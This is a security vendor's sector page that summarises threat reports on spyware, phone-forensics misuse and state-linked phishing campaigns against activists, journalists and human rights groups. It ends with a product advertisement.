✨ The Containment Era is here. Secure AI workloads before they breach. →The Containment Era is here. →The Containment Era is here. →Explore ✨
Civic/Social Organization
Breach intelligence, attack campaigns, and threat reports targeting the Civic/Social Organization sector.
Explore Other Sectors
Civic/Social Organization Threat Reports
Russia's Continued Use of Cellebrite Tools Raises Concerns
In June 2021, Russian authorities utilized Cellebrite's Universal Forensic Extraction Device (UFED) to access the iPhone of detained human rights activist Andrey Pivovarov. This occurred despite Cellebrite's public announcement in March 2021 that it had ceased all sales and services to Russian government agencies. The extracted data reportedly included communications from encrypted messaging apps, which were subsequently used to surveil other dissidents. This incident underscores the challenges technology companies face in controlling the use of their tools post-sale, especially when they are employed for political repression. The case highlights the need for robust mechanisms to prevent the misuse of surveillance technologies by authoritarian regimes, even after contractual relationships have been terminated.
22 hours ago
Kill Chain
WhatsApp Thwarts NSO Group's Latest Spyware Phishing Attacks
In June 2026, WhatsApp identified and disrupted spear-phishing campaigns linked to the NSO Group, an Israeli spyware vendor known for its Pegasus tool. These attacks involved social engineering tactics, attempting to lure users into clicking malicious links that redirected them to external websites, aiming to deploy spyware. This activity violated a 2025 U.S. court injunction that barred NSO from targeting WhatsApp and its users. Meta, WhatsApp's parent company, responded by filing a federal court contempt order against NSO for this breach. This incident underscores the persistent threat posed by commercial spyware vendors and highlights the importance of robust security measures and legal frameworks to protect user privacy and national security.
2 weeks ago
Kill Chain
Bitter APT's Hack-for-Hire Campaign Targets MENA Journalists
In a series of cyber espionage activities from 2023 to 2024, the Bitter APT group, suspected to have ties to the Indian government, orchestrated a hack-for-hire campaign targeting journalists, activists, and government officials across the Middle East and North Africa (MENA) region. Notably, Egyptian journalists Mostafa Al-A'sar and Ahmed Eltantawy were subjected to spear-phishing attacks aimed at compromising their Apple and Google accounts. These attacks involved deceptive emails leading to counterfeit login pages designed to harvest credentials and two-factor authentication codes. ([thehackernews.com](https://thehackernews.com/2026/04/bitter-linked-hack-for-hire-campaign.html?utm_source=openai)) This incident underscores a concerning trend of state-affiliated threat actors employing sophisticated social engineering tactics to infiltrate the accounts of individuals critical of governmental policies. The Bitter APT group's activities highlight the persistent and evolving nature of cyber threats targeting civil society in the MENA region. ([accessnow.org](https://www.accessnow.org/press-release/hack-for-hire-new-report-egyptian-journalists/?utm_source=openai))
2 months ago
Kill Chain
Unveiling the 2023-2024 Hack-for-Hire Campaign Targeting Journalists in MENA
Between 2023 and 2024, a sophisticated hack-for-hire campaign targeted journalists and activists in the Middle East and North Africa, notably in Egypt and Lebanon. The attackers employed spear-phishing techniques, sending messages that appeared to be from legitimate sources to deceive victims into revealing personal data, including credentials and financial information. This campaign has been linked to the Bitter APT group, known for targeting government and critical infrastructure sectors across South Asia. The operation underscores the persistent threat posed by state-sponsored cyber espionage groups utilizing advanced social engineering tactics to infiltrate and compromise sensitive information. ([accessnow.org](https://www.accessnow.org/press-release/hack-for-hire-new-report-egyptian-journalists/?utm_source=openai))
2 months ago
Kill Chain
CRESCENTHARVEST Malware Campaign Exploits Iran Protests to Target Supporters
In early January 2026, a cyberespionage campaign named CRESCENTHARVEST emerged, targeting individuals supporting Iran's anti-government protests. Attackers distributed malicious archive files containing authentic protest media and Farsi-language reports, alongside disguised Windows shortcut (.LNK) files. When executed, these shortcuts deployed a remote access trojan (RAT) capable of executing commands, logging keystrokes, and exfiltrating sensitive data. The campaign's sophistication suggests alignment with Iranian state interests, aiming for long-term surveillance and information theft. This incident underscores the increasing use of geopolitical events as lures in cyberattacks, highlighting the need for heightened vigilance among activists, journalists, and dissidents. The campaign's reliance on social engineering and legitimate-looking media emphasizes the importance of verifying the authenticity of received files, especially those related to sensitive political contexts.
4 months ago
Kill Chain
Kenyan Activist's Phone Compromised by Cellebrite Extraction
In July 2025, Kenyan pro-democracy activist Boniface Mwangi was arrested, and his personal devices were confiscated by authorities. Upon their return in September 2025, Mwangi discovered that his Samsung phone's password protection had been removed. Forensic analysis by Citizen Lab revealed with high confidence that Kenyan authorities utilized Cellebrite's forensic extraction tools on his device during its custody, enabling full access to sensitive information including messages, personal files, financial data, and passwords. This incident underscores the potential misuse of advanced surveillance technologies by government entities to target civil society members. The case highlights the growing concerns over digital privacy and the ethical implications of deploying such tools without proper oversight, emphasizing the need for stringent regulations to prevent abuse and protect individual rights.
4 months ago
Kill Chain
RedKitten 2026: Iranian State-Sponsored Malware Targets Human Rights NGOs
In January 2026, a cyber espionage campaign named RedKitten targeted non-governmental organizations and individuals documenting human rights abuses in Iran. The attackers employed AI-generated malware, delivered through malicious Excel files disguised as casualty records from recent protests. Upon enabling macros, the malware, dubbed SloppyMIO, was deployed, utilizing GitHub and Google Drive for configuration and Telegram for command-and-control. This operation is attributed to Iranian state-sponsored actors aiming to infiltrate and disrupt human rights documentation efforts. ([harfanglab.io](https://harfanglab.io/insidethelab/redkitten-ai-accelerated-campaign-targeting-iranian-protests/?utm_source=openai)) This incident underscores the escalating use of artificial intelligence in cyber attacks, enabling rapid development and deployment of sophisticated malware. The targeting of human rights organizations highlights the increasing risks faced by civil society groups, emphasizing the need for enhanced cybersecurity measures and vigilance against state-sponsored cyber threats.
4 months ago
Kill Chain
WhatsApp Unveils "Strict Account Settings" to Combat Spyware in 2024
In June 2024, WhatsApp introduced a lockdown-style "Strict Account Settings" feature to counter the growing threat of spyware targeting its user base—including journalists, activists, and public figures. This proactive measure allows users to limit messaging and attachment options from unknown contacts, mitigating risks of exploitation similar to past incidents like the Pegasus spyware attacks. The rollout follows WhatsApp’s ongoing legal battles with threat actors and reflects the platform’s drive to strengthen user privacy and security in the wake of sophisticated surveillance malware campaigns. This development highlights an industry-wide shift towards advanced, user-accessible security controls as spyware campaigns become more adept at circumventing traditional defenses. Organizations and high-risk users face mounting pressure from both regulatory frameworks and adversary innovation, compelling tech platforms to continually adapt and raise the bar for account protection and threat mitigation.
4 months ago
Kill Chain
Jordan Government’s Use of Cellebrite Forensics Tools Targets Activists in 2024
Between late 2023 and mid-2024, Jordanian authorities used Cellebrite’s digital forensic technology to access and extract data from the mobile phones of local activists and human rights defenders. According to an investigation by Citizen Lab and OCCRP, authorities seized activists’ devices—three iPhones and one Android—and subjected them to Cellebrite’s phone-cracking tools, often in connection with political protests. Court records and forensic analysis confirmed the use of Cellebrite products to nonconsensually access information, shaking victims’ trust and prompting self-censorship. This incident underscores the growing risks of commercial digital forensics tools being repurposed for surveillance beyond criminal cases. Amnesty International and other watchdogs report a broader trend of such technologies being leveraged against civil society, signaling a need for stronger governance, vendor accountability, and compliance oversight globally.
5 months ago
Kill Chain
Dormant No More: Prince of Persia APT's Sophisticated Espionage Tactics Unveiled in 2025
In December 2025, security researchers revealed that the dormant Iranian advanced persistent threat (APT) group "Prince of Persia" (also known as "Infy") had remained operational for years, despite perceived inactivity. Leveraging upgraded versions of their Foudre and Tonnerre malware families, the group engaged in persistent cyber espionage targeting Iranian dissidents, as well as individuals in Iraq, Turkey, India, Europe, and Canada. The attackers employed advanced cryptographic techniques for command-and-control (C2) communication—such as RSA signature verification for dynamically generated C2 domains and Telegram-based channels—enabling stealthy, resilient infrastructure and evading traditional detection or takedown efforts. The group’s sophisticated use of operational security, government support, and resilient infrastructure sets it apart from typical regional APTs. This incident underscores increasing sophistication among state-backed APT groups and highlights modern approaches to persistence and evasion, particularly as threat actors adopt novel uses of cryptography and messaging platforms for infrastructure protection. It warns organizations worldwide to review their readiness against stealthy advanced campaigns that evade known countermeasures.
5 months ago
Kill Chain
Intellexa Predator Spyware Strikes Pakistani Civil Society via WhatsApp (2025)
In June 2025, a human rights lawyer based in Balochistan, Pakistan, was targeted by Intellexa's highly advanced Predator spyware via a malicious WhatsApp link, according to Amnesty International. This marks the first documented case of a civil society member in Pakistan being targeted by this tool. The attacker, likely operating with government-grade resources, used zero-day exploits and an advertising-based infection vector to bypass conventional defenses, aiming to infiltrate the lawyer's mobile device and access sensitive communications. This incident underscores the growing sophistication of spyware campaigns and the expansion of mercenary surveillance tools targeting individuals beyond political figures or journalists. It highlights the urgent need for robust communication security and regulatory scrutiny of commercial spyware vendors.
5 months ago
Kill Chain
CISA Warns: Surge in Spyware Targeting Messaging Apps (2024)
In June 2024, the Cybersecurity and Infrastructure Security Agency (CISA) issued a critical alert about threat actors leveraging commercial spyware to infiltrate messaging applications. Attackers have used sophisticated social engineering and mimicry of trusted messaging apps to deploy Android spyware—sometimes via malicious image files shared through platforms like WhatsApp—or by exploiting vulnerabilities in applications such as Signal, especially targeting Samsung devices. The primary victims are high-value individuals, including government, military, and political officials, as well as civil society members, with attacks observed across the United States, the Middle East, and Europe. These threats enable threat actors to gain unauthorized device access and deploy further malicious payloads, jeopardizing personal and organizational data. CISA’s latest alert underscores a sharp escalation in opportunistic spyware attacks, using new delivery vectors such as malicious QR codes and zero-click exploits. The advisory highlights the urgent need for preventative security hygiene, particularly as attackers increasingly aim at mobile messaging platforms used by sensitive sectors.
5 months ago
Kill Chain
Stop Active Cloud Data Exfiltration
Aviatrix Breach Lock helps teams instantly identify what data is leaving the environment, from which workload, and where it’s going — during an active breach.
Looking for threats in a different sector?
Browse All Threat Reports